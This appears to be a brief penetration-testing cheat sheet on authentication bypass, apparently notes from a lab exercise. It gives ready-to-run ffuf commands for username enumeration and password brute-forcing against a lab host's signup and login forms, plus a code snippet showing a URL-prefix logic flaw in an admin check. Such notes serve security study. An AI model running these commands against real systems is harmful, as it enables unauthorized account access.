Authentication bypass
Username Enumeration
Automated with ffuf:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <http://10.10.83.53/customers/signup> -mr "username already exists"Brute forcing passwords with username list and password list with ffuf:
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <http://10.10.83.53/customers/login> -fc 200Logic flaw
if( url.substr(0,6) === '/admin') {
# Code to check user is an admin
} else {
# View Page
}Cookie tampering
HTTP authentication header bruteforce
Last updated